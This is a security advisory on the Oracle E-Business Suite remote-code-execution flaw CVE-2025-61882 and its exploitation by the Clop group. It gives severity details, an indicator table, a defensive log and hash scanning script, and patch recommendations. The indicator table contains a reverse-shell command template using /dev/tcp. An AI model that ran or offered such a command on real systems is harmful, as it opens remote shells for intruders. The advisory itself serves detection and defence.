CVE-2025-61882: Critical E-Business Suite zero-day vulnerability
Observation Summary
Oracle has released an advisory about a critical E-Business Suite zero-day vulnerability CVE-2025-61882 that allows attackers to perform unauthenticated remote code execution, with the flaw actively exploited in Clop data theft attacks.
What’s Happening
CVE-2025-61882 is a critical zero-day vulnerability in Oracle E-Business Suite that allows unauthenticated remote code execution and has been actively exploited by the Clop ransomware group. It carries a CVSS score of 9.8, indicating an urgent security risk because it can be exploited over the network without any authentication.
CVSSv3 score: 9.8 (Critical)
Score as per Recorded Future: 99
Affected Product: Oracle E-Business Suite (EBS)
Component: Concurrent Processing – BI Publisher Integration
Attack Vector: Remote, unauthenticated (no username/password required)
First Reported: Oct 5, 2025
Affected Products and Versions: Oracle E-Business Suite, versions 12.2.3-12.2.14
Indicators of Compromise (IOCs)
| Indicator | Type | Description |
| --- | --- | --- |
| 200[.]107[.]207.26 | IP | Potential GET and POST activity |
| 185[.]181[.]60.11 | IP | Potential GET and POST activity |
| sh -c /bin/bash -i >& /dev/tcp// 0>&1 | Command | Establishes an outbound TCP connection over a specific port |
| 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
| aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
| 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |
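As an added example (not part of the advisory), a small Python triage script that applies the indicators above to a web server access log and to a file tree: it matches client IPs against the two listed addresses and file hashes against the three listed SHA256 values. The combined access-log format, the sample log lines and the request paths in them are assumptions constructed for the example.

```python
import hashlib
import re
from pathlib import Path

# Indicators copied from the advisory table above. "[.]" is defanging and is
# stripped before matching against real log data.
IOC_IPS = {"200[.]107[.]207.26", "185[.]181[.]60.11"}
IOC_SHA256 = {
    "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d",
    "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121",
    "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b",
}

def refang(indicator: str) -> str:
    """Turn a defanged indicator such as 1[.]2[.]3[.]4 back into 1.2.3.4."""
    return indicator.replace("[.]", ".")

REFANGED_IPS = {refang(ip) for ip in IOC_IPS}

# Assumed common/combined access-log format: client IP, then the quoted request
# line ("METHOD PATH PROTOCOL") and the HTTP status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

def scan_access_log(lines):
    """Return (ip, timestamp, method, path, status) for each request from an IOC IP."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and m.group(1) in REFANGED_IPS:
            hits.append(m.groups())
    return hits

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def is_ioc_hash(digest: str) -> bool:
    return digest.lower() in IOC_SHA256

def find_ioc_files(root: Path):
    """Return files under root whose SHA256 matches one of the advisory hashes."""
    return [p for p in root.rglob("*")
            if p.is_file() and is_ioc_hash(sha256_hex(p.read_bytes()))]

# Constructed sample lines (not real traffic); the request paths are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Oct/2025:08:12:01 +0000] "GET /example/login HTTP/1.1" 200 512',
    '200.107.207.26 - - [06/Oct/2025:08:13:44 +0000] "POST /example/upload HTTP/1.1" 200 77',
]
```

Run `scan_access_log` over the real access log lines and `find_ioc_files` over the EBS application tree; a hit on either is grounds to start incident response rather than just patching.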
Why It Matters
Exploitation of CVE-2025-61882 can result in:
- Attackers gaining shell access to Oracle EBS servers, enabling installation of malware, data exfiltration, and privilege escalation.
- Disruption of enterprise operations: Oracle EBS is often central to finance, HR, and procurement, so downtime can halt critical workflows.
- Compromise extending beyond the organization if EBS is integrated with external vendors or partners.
Recommendations
- Apply Oracle’s Critical Patch Update (CPU) for prerequisite fixes.
- Apply the Emergency Patch for CVE-2025-61882 available via My Oracle Support (Doc ID: 30061882.1).
- Block public access to EBS BI Publisher endpoints if not required.
- Use Web Application Firewalls (WAFs) to detect and block suspicious payloads.
- Enable verbose logging for BI Publisher and Concurrent Manager.
- Audit recent changes to EBS configuration files and deployed servlets.